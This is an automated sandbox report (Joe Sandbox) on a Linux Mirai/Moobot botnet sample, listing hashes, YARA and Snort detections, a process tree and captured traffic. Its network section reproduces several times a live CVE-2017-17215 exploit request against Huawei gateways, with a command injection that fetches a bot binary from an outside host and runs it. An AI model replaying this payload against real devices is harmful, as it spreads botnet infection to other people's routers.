Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
v8OWS3Ylfj.elf

Overview

General Information

Sample Name:v8OWS3Ylfj.elf
Original Sample Name:2b318e2fa59dccaa45cc59c5fea7e082.elf
Analysis ID:830702
MD5:2b318e2fa59dccaa45cc59c5fea7e082
SHA1:d5bf527325fbfbda5d26272bb88874bc504dd260
SHA256:7bbce804ece6b26f0fcf2937fd5217518848f044c95cc6d033f5a08f04598a06
Tags:32elfintelmirai
Infos:

Detection

Mirai, Moobot
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara detected Moobot
Snort IDS alert for network traffic
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Yara signature match
Sample has stripped symbol table
HTTP GET or POST without a user agent
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.

General Information

Joe Sandbox Version:37.0.0 Beryl
Analysis ID:830702
Start date and time:2023-03-20 16:12:59 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 1s
Hypervisor based Inspection enabled:false
Report type:light
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample file name:v8OWS3Ylfj.elf
Original Sample Name:2b318e2fa59dccaa45cc59c5fea7e082.elf
Detection:MAL
Classification:mal92.troj.linELF@0/0@1/0

Warnings

  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100

Runtime Messages

Command:/tmp/v8OWS3Ylfj.elf
PID:6223
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:sh: 1: Syntax error: Unterminated quoted string

Process Tree

  • system is lnxubuntu20
  • v8OWS3Ylfj.elf (PID: 6223, Parent: 6125, MD5: 2b318e2fa59dccaa45cc59c5fea7e082) Arguments: /tmp/v8OWS3Ylfj.elf
    • sh (PID: 6224, Parent: 6223, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv \"/tmp/v8OWS3Ylfj.elf \\xdc\u0420\\xff\\x84\\x88&bin/watchdog; chmod 777 bin/watchdog"
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
MooBotNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
v8OWS3Ylfj.elfJoeSecurity_MoobotYara detected MoobotJoe Security
    v8OWS3Ylfj.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      v8OWS3Ylfj.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0xb9b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xb9cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xb9e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xb9f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xba08:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xba1c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xba30:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xba44:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xba58:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xba6c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xba80:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xba94:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xbaa8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xbabc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xbad0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xbae4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xbaf8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xbb0c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xbb20:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xbb34:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xbb48:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      v8OWS3Ylfj.elfLinux_Trojan_Gafgyt_5bf62ce4unknownunknown
      • 0x97b1:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
      v8OWS3Ylfj.elfLinux_Trojan_Mirai_b14f4c5dunknownunknown
      • 0x3d80:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
      Click to see the 5 entries

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      6223.1.0000000008048000.0000000008056000.r-x.sdmpJoeSecurity_MoobotYara detected MoobotJoe Security
        6223.1.0000000008048000.0000000008056000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6223.1.0000000008048000.0000000008056000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0xb9b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xb9cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xb9e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xb9f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xba08:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xba1c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xba30:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xba44:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xba58:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xba6c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xba80:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xba94:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xbaa8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xbabc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xbad0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xbae4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xbaf8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xbb0c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xbb20:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xbb34:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xbb48:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          6223.1.0000000008048000.0000000008056000.r-x.sdmpLinux_Trojan_Gafgyt_5bf62ce4unknownunknown
          • 0x97b1:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
          6223.1.0000000008048000.0000000008056000.r-x.sdmpLinux_Trojan_Mirai_b14f4c5dunknownunknown
          • 0x3d80:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
          Click to see the 6 entries

          Snort Signatures

          Timestamp:192.168.2.23195.133.40.20236176569992030490 03/20/23-16:13:48.596290
          SID:2030490
          Source Port:36176
          Destination Port:56999
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:195.133.40.202192.168.2.2356999361762030489 03/20/23-16:13:53.166618
          SID:2030489
          Source Port:56999
          Destination Port:36176
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23195.164.211.5057976372152835222 03/20/23-16:13:57.691757
          SID:2835222
          Source Port:57976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: v8OWS3Ylfj.elfVirustotal: Detection: 56%Perma Link
          Source: v8OWS3Ylfj.elfReversingLabs: Detection: 58%
          Machine Learning detection for sample
          Source: v8OWS3Ylfj.elfJoe Sandbox ML: detected

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:36176 -> 195.133.40.202:56999
          Source: TrafficSnort IDS: 2030489 ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response 195.133.40.202:56999 -> 192.168.2.23:36176
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57976 -> 195.164.211.50:37215
          Uses known network protocols on non-standard ports
          Source: unknownNetwork traffic detected: HTTP traffic on port 57976 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57976 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57976 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57976 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46180 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42668 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 42668
          Source: unknownNetwork traffic detected: HTTP traffic on port 34274 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34274 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54054 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54054 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54054 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54054 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54054 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43448 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43448 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43448 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 32862 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54054 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54054 -> 37215
          Performs DNS queries to domains with low reputation
          Source: DNS query: test.zxyes.xyz
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 